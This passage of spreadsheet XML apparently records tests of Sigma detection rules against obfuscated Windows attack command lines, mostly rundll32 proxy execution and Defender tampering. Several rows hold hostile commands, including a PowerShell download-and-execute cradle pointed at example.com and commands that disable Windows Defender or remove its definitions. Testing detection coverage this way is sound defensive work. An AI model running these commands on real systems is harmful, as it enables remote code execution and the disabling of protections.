          <t>15bd98ea-55f4-4d37-b09a-e7caa0fa2221</t>
        </is>
      </c>
      <c r="E3845" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c rundll32.exe desk.cpl,InstallS^creenSaver not_an_scr.scr</t>
        </is>
      </c>
      <c r="F3845" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3845" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3845" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3845" s="44" t="inlineStr">
        <is>
          <t>Rundll32 InstallScreenSaver Execution (15bd98ea-55f4-4d37-b09a-e7caa0fa2221)</t>
        </is>
      </c>
      <c r="J3845" s="44" t="n"/>
      <c r="K3845" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3846" ht="15.75" customHeight="1" s="42">
      <c r="A3846" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3846" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_shell32_susp_execution</t>
        </is>
      </c>
      <c r="C3846" s="44" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory</t>
        </is>
      </c>
      <c r="D3846" s="44" t="inlineStr">
        <is>
          <t>32b96012-7892-429e-b26c-ac2bf46066ff</t>
        </is>
      </c>
      <c r="E3846" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe "shell32".dll,Control_RunDLL C:\Users\Public\benign.cpl</t>
        </is>
      </c>
      <c r="F3846" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3846" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3846" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3846" s="44" t="inlineStr">
        <is>
          <t>Control Panel Items (0ba863e6-def5-4e50-9cea-4dd8c7dc46a4)</t>
        </is>
      </c>
      <c r="J3846" s="44" t="n"/>
      <c r="K3846" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3847" ht="15.75" customHeight="1" s="42">
      <c r="A3847" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3847" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_shell32_susp_execution</t>
        </is>
      </c>
      <c r="C3847" s="44" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory</t>
        </is>
      </c>
      <c r="D3847" s="44" t="inlineStr">
        <is>
          <t>32b96012-7892-429e-b26c-ac2bf46066ff</t>
        </is>
      </c>
      <c r="E3847" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c rundll32.exe shell32.dll,Control_R^unDLL C:\Users\Public\benign.cpl</t>
        </is>
      </c>
      <c r="F3847" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3847" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3847" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3847" s="44" t="inlineStr">
        <is>
          <t>Control Panel Items (0ba863e6-def5-4e50-9cea-4dd8c7dc46a4); Control Panel Items (0ba863e6-def5-4e50-9cea-4dd8c7dc46a4); Shell32 DLL Execution in Suspicious Directory (32b96012-7892-429e-b26c-ac2bf46066ff); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9)</t>
        </is>
      </c>
      <c r="J3847" s="44" t="n"/>
      <c r="K3847" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3848" ht="15.75" customHeight="1" s="42">
      <c r="A3848" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3848" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_shell32_susp_execution</t>
        </is>
      </c>
      <c r="C3848" s="44" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory</t>
        </is>
      </c>
      <c r="D3848" s="44" t="inlineStr">
        <is>
          <t>32b96012-7892-429e-b26c-ac2bf46066ff</t>
        </is>
      </c>
      <c r="E3848" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe shell32.dll,Control_RunDLL C:\Users\%USERNAME%\..\Public\benign.cpl</t>
        </is>
      </c>
      <c r="F3848" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3848" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3848" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3848" s="44" t="inlineStr">
        <is>
          <t>Control Panel Items (0ba863e6-def5-4e50-9cea-4dd8c7dc46a4); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9)</t>
        </is>
      </c>
      <c r="J3848" s="44" t="n"/>
      <c r="K3848" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3849" ht="15.75" customHeight="1" s="42">
      <c r="A3849" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3849" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_sys</t>
        </is>
      </c>
      <c r="C3849" s="44" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Activity Invoking Sys File</t>
        </is>
      </c>
      <c r="D3849" s="44" t="inlineStr">
        <is>
          <t>731231b9-0b5d-4219-94dd-abb6959aa7ea</t>
        </is>
      </c>
      <c r="E3849" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe "C:\Windows\Temp\driver.sys",DllMain</t>
        </is>
      </c>
      <c r="F3849" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3849" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3849" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3849" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J3849" s="44" t="n"/>
      <c r="K3849" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3850" ht="15.75" customHeight="1" s="42">
      <c r="A3850" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3850" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_sys</t>
        </is>
      </c>
      <c r="C3850" s="44" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Activity Invoking Sys File</t>
        </is>
      </c>
      <c r="D3850" s="44" t="inlineStr">
        <is>
          <t>731231b9-0b5d-4219-94dd-abb6959aa7ea</t>
        </is>
      </c>
      <c r="E3850" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c rundll32.exe C:\Windows\Temp\driver.sy^s,DllMain</t>
        </is>
      </c>
      <c r="F3850" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3850" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3850" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3850" s="44" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Activity Invoking Sys File (731231b9-0b5d-4219-94dd-abb6959aa7ea); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J3850" s="44" t="n"/>
      <c r="K3850" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3851" ht="15.75" customHeight="1" s="42">
      <c r="A3851" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3851" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_sys</t>
        </is>
      </c>
      <c r="C3851" s="44" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Activity Invoking Sys File</t>
        </is>
      </c>
      <c r="D3851" s="44" t="inlineStr">
        <is>
          <t>731231b9-0b5d-4219-94dd-abb6959aa7ea</t>
        </is>
      </c>
      <c r="E3851" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\Temp\driver.sys	DllMain</t>
        </is>
      </c>
      <c r="F3851" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3851" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3851" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3851" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J3851" s="44" t="n"/>
      <c r="K3851" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3852" ht="15.75" customHeight="1" s="42">
      <c r="A3852" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3852" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_bad_opsec_sacrificial_processes</t>
        </is>
      </c>
      <c r="C3852" s="44" t="inlineStr">
        <is>
          <t>Bad Opsec Defaults Sacrificial Processes With Improper Arguments</t>
        </is>
      </c>
      <c r="D3852" s="44" t="inlineStr">
        <is>
          <t>a7c3d773-caef-227e-a7e7-c2f13c622329</t>
        </is>
      </c>
      <c r="E3852" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe</t>
        </is>
      </c>
      <c r="F3852" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3852" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3852" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3852" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without Parameters (5bb68627-3198-40ca-b458-49f973db8752); Bad Opsec Defaults Sacrificial Processes With Improper Arguments (a7c3d773-caef-227e-a7e7-c2f13c622329); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J3852" s="44" t="n"/>
      <c r="K3852" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3853" ht="15.75" customHeight="1" s="42">
      <c r="A3853" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3853" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_bad_opsec_sacrificial_processes</t>
        </is>
      </c>
      <c r="C3853" s="44" t="inlineStr">
        <is>
          <t>Bad Opsec Defaults Sacrificial Processes With Improper Arguments</t>
        </is>
      </c>
      <c r="D3853" s="44" t="inlineStr">
        <is>
          <t>a7c3d773-caef-227e-a7e7-c2f13c622329</t>
        </is>
      </c>
      <c r="E3853" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe -dummy</t>
        </is>
      </c>
      <c r="F3853" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3853" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3853" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3853" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J3853" s="44" t="n"/>
      <c r="K3853" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3854" ht="15.75" customHeight="1" s="42">
      <c r="A3854" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3854" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_bad_opsec_sacrificial_processes</t>
        </is>
      </c>
      <c r="C3854" s="44" t="inlineStr">
        <is>
          <t>Bad Opsec Defaults Sacrificial Processes With Improper Arguments</t>
        </is>
      </c>
      <c r="D3854" s="44" t="inlineStr">
        <is>
          <t>a7c3d773-caef-227e-a7e7-c2f13c622329</t>
        </is>
      </c>
      <c r="E3854" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe</t>
        </is>
      </c>
      <c r="F3854" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3854" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3854" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3854" s="44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3854" s="44" t="n"/>
      <c r="K3854" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3855" ht="15.75" customHeight="1" s="42">
      <c r="A3855" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3855" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_bad_opsec_sacrificial_processes</t>
        </is>
      </c>
      <c r="C3855" s="44" t="inlineStr">
        <is>
          <t>Bad Opsec Defaults Sacrificial Processes With Improper Arguments</t>
        </is>
      </c>
      <c r="D3855" s="44" t="inlineStr">
        <is>
          <t>a7c3d773-caef-227e-a7e7-c2f13c622329</t>
        </is>
      </c>
      <c r="E3855" s="44" t="inlineStr">
        <is>
          <t>"rundll32.exe"</t>
        </is>
      </c>
      <c r="F3855" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3855" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3855" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3855" s="44" t="n"/>
      <c r="J3855" s="44" t="n"/>
      <c r="K3855" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3856" ht="15.75" customHeight="1" s="42">
      <c r="A3856" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3856" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_powershell_execution_via_dll</t>
        </is>
      </c>
      <c r="C3856" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Execution Via DLL</t>
        </is>
      </c>
      <c r="D3856" s="44" t="inlineStr">
        <is>
          <t>6812a10b-60ea-420c-832f-dfcc33b646ba</t>
        </is>
      </c>
      <c r="E3856" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe PowerShdll.dll,main -w "I""EX (New-Object Net.WebClient).DownloadString('http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F3856" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3856" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3856" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3856" s="44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3856" s="44" t="n"/>
      <c r="K3856" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3857" ht="15.75" customHeight="1" s="42">
      <c r="A3857" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3857" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_powershell_execution_via_dll</t>
        </is>
      </c>
      <c r="C3857" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Execution Via DLL</t>
        </is>
      </c>
      <c r="D3857" s="44" t="inlineStr">
        <is>
          <t>6812a10b-60ea-420c-832f-dfcc33b646ba</t>
        </is>
      </c>
      <c r="E3857" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe PowerShdll.dll,main -w ".((gcm *e-Ex*).name) (New-Object Net.WebClient).DownloadString('http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F3857" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3857" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3857" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3857" s="44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3857" s="44" t="n"/>
      <c r="K3857" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3858" ht="15.75" customHeight="1" s="42">
      <c r="A3858" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3858" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_powershell_execution_via_dll</t>
        </is>
      </c>
      <c r="C3858" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Execution Via DLL</t>
        </is>
      </c>
      <c r="D3858" s="44" t="inlineStr">
        <is>
          <t>6812a10b-60ea-420c-832f-dfcc33b646ba</t>
        </is>
      </c>
      <c r="E3858" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe PowerShdll.dll,main -w "&amp; (([char]73)+([char]69)+([char]88)) (New-Object Net.WebClient).DownloadString('http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F3858" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3858" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3858" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3858" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Execution Via DLL (6812a10b-60ea-420c-832f-dfcc33b646ba); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3858" s="44" t="n"/>
      <c r="K3858" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3859" ht="15.75" customHeight="1" s="42">
      <c r="A3859" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3859" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_default_action_modified</t>
        </is>
      </c>
      <c r="C3859" s="44" t="inlineStr">
        <is>
          <t>PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction</t>
        </is>
      </c>
      <c r="D3859" s="44" t="inlineStr">
        <is>
          <t>1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e</t>
        </is>
      </c>
      <c r="E3859" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-MpPreference -LowThreatDefaultAction @('Allow')[0]"</t>
        </is>
      </c>
      <c r="F3859" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3859" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3859" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3859" s="44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J3859" s="44" t="n"/>
      <c r="K3859" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3860" ht="15.75" customHeight="1" s="42">
      <c r="A3860" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3860" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_default_action_modified</t>
        </is>
      </c>
      <c r="C3860" s="44" t="inlineStr">
        <is>
          <t>PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction</t>
        </is>
      </c>
      <c r="D3860" s="44" t="inlineStr">
        <is>
          <t>1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e</t>
        </is>
      </c>
      <c r="E3860" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-MpPreference -LowThreatDefaultAction 0x6"</t>
        </is>
      </c>
      <c r="F3860" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3860" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3860" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3860" s="44" t="inlineStr">
        <is>
          <t>PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction' (1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e); PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction' (1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e)</t>
        </is>
      </c>
      <c r="J3860" s="44" t="n"/>
      <c r="K3860" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3861" ht="15.75" customHeight="1" s="42">
      <c r="A3861" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3861" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_remove_context_menu</t>
        </is>
      </c>
      <c r="C3861" s="44" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed</t>
        </is>
      </c>
      <c r="D3861" s="44" t="inlineStr">
        <is>
          <t>b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b</t>
        </is>
      </c>
      <c r="E3861" s="44" t="inlineStr">
        <is>
          <t>reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f</t>
        </is>
      </c>
      <c r="F3861" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3861" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3861" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3861" s="44" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed (b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b)</t>
        </is>
      </c>
      <c r="J3861" s="44" t="n"/>
      <c r="K3861" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3862" ht="15.75" customHeight="1" s="42">
      <c r="A3862" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3862" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_remove_context_menu</t>
        </is>
      </c>
      <c r="C3862" s="44" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed</t>
        </is>
      </c>
      <c r="D3862" s="44" t="inlineStr">
        <is>
          <t>b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b</t>
        </is>
      </c>
      <c r="E3862" s="44" t="inlineStr">
        <is>
          <t>reg.exe del "HKCR\*\shellex\\ContextMenuHandlers\\EPP" /f</t>
        </is>
      </c>
      <c r="F3862" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3862" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3862" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3862" s="44" t="n"/>
      <c r="J3862" s="44" t="n"/>
      <c r="K3862" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3863" ht="15.75" customHeight="1" s="42">
      <c r="A3863" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3863" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_remove_context_menu</t>
        </is>
      </c>
      <c r="C3863" s="44" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed</t>
        </is>
      </c>
      <c r="D3863" s="44" t="inlineStr">
        <is>
          <t>b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b</t>
        </is>
      </c>
      <c r="E3863" s="44" t="inlineStr">
        <is>
          <t>reg.exe del "HKCR\*\shellex\ContextMenuHandlers\E""PP" /f</t>
        </is>
      </c>
      <c r="F3863" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3863" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3863" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3863" s="44" t="n"/>
      <c r="J3863" s="44" t="n"/>
      <c r="K3863" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3864" ht="15.75" customHeight="1" s="42">
      <c r="A3864" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3864" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_remove_context_menu</t>
        </is>
      </c>
      <c r="C3864" s="44" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed</t>
        </is>
      </c>
      <c r="D3864" s="44" t="inlineStr">
        <is>
          <t>b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b</t>
        </is>
      </c>
      <c r="E3864" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Remove-Item -Path 'HKLM:\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP' -LiteralPath"</t>
        </is>
      </c>
      <c r="F3864" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3864" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3864" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3864" s="44" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed (b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b)</t>
        </is>
      </c>
      <c r="J3864" s="44" t="n"/>
      <c r="K3864" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3865" ht="15.75" customHeight="1" s="42">
      <c r="A3865" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3865" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dism_remove</t>
        </is>
      </c>
      <c r="C3865" s="44" t="inlineStr">
        <is>
          <t>Dism Remove Online Package</t>
        </is>
      </c>
      <c r="D3865" s="44" t="inlineStr">
        <is>
          <t>43e32da2-fdd0-4156-90de-50dfd62636f9</t>
        </is>
      </c>
      <c r="E3865" s="44" t="inlineStr">
        <is>
          <t>dism.exe "/Online" "/Disable-Feature" -FeatureName:Windows-Defender /NoRestart /quiet</t>
        </is>
      </c>
      <c r="F3865" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3865" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3865" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3865" s="44" t="inlineStr">
        <is>
          <t>Dism Remove Online Package (43e32da2-fdd0-4156-90de-50dfd62636f9)</t>
        </is>
      </c>
      <c r="J3865" s="44" t="n"/>
      <c r="K3865" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3866" ht="15.75" customHeight="1" s="42">
      <c r="A3866" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3866" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dism_remove</t>
        </is>
      </c>
      <c r="C3866" s="44" t="inlineStr">
        <is>
          <t>Dism Remove Online Package</t>
        </is>
      </c>
      <c r="D3866" s="44" t="inlineStr">
        <is>
          <t>43e32da2-fdd0-4156-90de-50dfd62636f9</t>
        </is>
      </c>
      <c r="E3866" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c dism.exe /On^line /Disable-Fe^ature -FeatureName:Windows-Defender /NoRestart /quiet</t>
        </is>
      </c>
      <c r="F3866" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3866" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3866" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3866" s="44" t="inlineStr">
        <is>
          <t>Dism Remove Online Package (43e32da2-fdd0-4156-90de-50dfd62636f9); Dism Remove Online Package (43e32da2-fdd0-4156-90de-50dfd62636f9)</t>
        </is>
      </c>
      <c r="J3866" s="44" t="n"/>
      <c r="K3866" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3867" ht="15.75" customHeight="1" s="42">
      <c r="A3867" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3867" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dism_remove</t>
        </is>
      </c>
      <c r="C3867" s="44" t="inlineStr">
        <is>
          <t>Dism Remove Online Package</t>
        </is>
      </c>
      <c r="D3867" s="44" t="inlineStr">
        <is>
          <t>43e32da2-fdd0-4156-90de-50dfd62636f9</t>
        </is>
      </c>
      <c r="E3867" s="44" t="inlineStr">
        <is>
          <t>dism.exe /Disable-Feature -FeatureName:Windows-Defender /Online /NoRestart /quiet</t>
        </is>
      </c>
      <c r="F3867" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3867" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3867" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3867" s="44" t="inlineStr">
        <is>
          <t>Dism Remove Online Package (43e32da2-fdd0-4156-90de-50dfd62636f9); Dism Remove Online Package (43e32da2-fdd0-4156-90de-50dfd62636f9)</t>
        </is>
      </c>
      <c r="J3867" s="44" t="n"/>
      <c r="K3867" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3868" ht="15.75" customHeight="1" s="42">
      <c r="A3868" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3868" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dism_remove</t>
        </is>
      </c>
      <c r="C3868" s="44" t="inlineStr">
        <is>
          <t>Dism Remove Online Package</t>
        </is>
      </c>
      <c r="D3868" s="44" t="inlineStr">
        <is>
          <t>43e32da2-fdd0-4156-90de-50dfd62636f9</t>
        </is>
      </c>
      <c r="E3868" s="44" t="inlineStr">
        <is>
          <t>dism.exe	/Online	/Disable-Feature	-FeatureName:Windows-Defender	/NoRestart	/quiet</t>
        </is>
      </c>
      <c r="F3868" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3868" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3868" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3868" s="44" t="inlineStr">
        <is>
          <t>Dism Remove Online Package (43e32da2-fdd0-4156-90de-50dfd62636f9); Dism Remove Online Package (43e32da2-fdd0-4156-90de-50dfd62636f9)</t>
        </is>
      </c>
      <c r="J3868" s="44" t="n"/>
      <c r="K3868" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3869" ht="15.75" customHeight="1" s="42">
      <c r="A3869" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3869" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_remove_windows_defender_definition</t>
        </is>
      </c>
      <c r="C3869" s="44" t="inlineStr">
        <is>
          <t>Windows Defender Definition Files Removed</t>
        </is>
      </c>
      <c r="D3869" s="44" t="inlineStr">
        <is>
          <t>9719a8aa-401c-41af-8108-ced7ec9cd75c</t>
        </is>
      </c>
      <c r="E3869" s="44" t="inlineStr">
        <is>
          <t>MpCmdRun.exe /RemoveDefinitions /All</t>
        </is>
      </c>
      <c r="F3869" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3869" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3869" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3869" s="44" t="n"/>
      <c r="J3869" s="44" t="n"/>
      <c r="K3869" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3870" ht="15.75" customHeight="1" s="42">
